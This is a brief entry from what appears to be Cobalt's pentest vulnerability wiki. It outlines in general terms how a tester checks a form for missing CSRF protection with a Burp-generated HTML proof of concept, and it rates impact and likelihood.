Cobalt Crowdsourced Application PentestCobalt Crowdsourced Application PentestCobalt Crowdsourced Application Pentest

Cobalt Vulnerability Wiki


V4 - Access Control

CSRF

POC

  • Observe that during sending the form, there is no CSRF token sent or X-CSRF-Token doesn’t exist
  • Create a PoC for CSRF HTML PoC file using Burp Pro
  • Open the HTML file to see if the intended function can be used by opening the HTML file

Impact

Low-Medium-High (depends on the action)

Likelihood

Low-Medium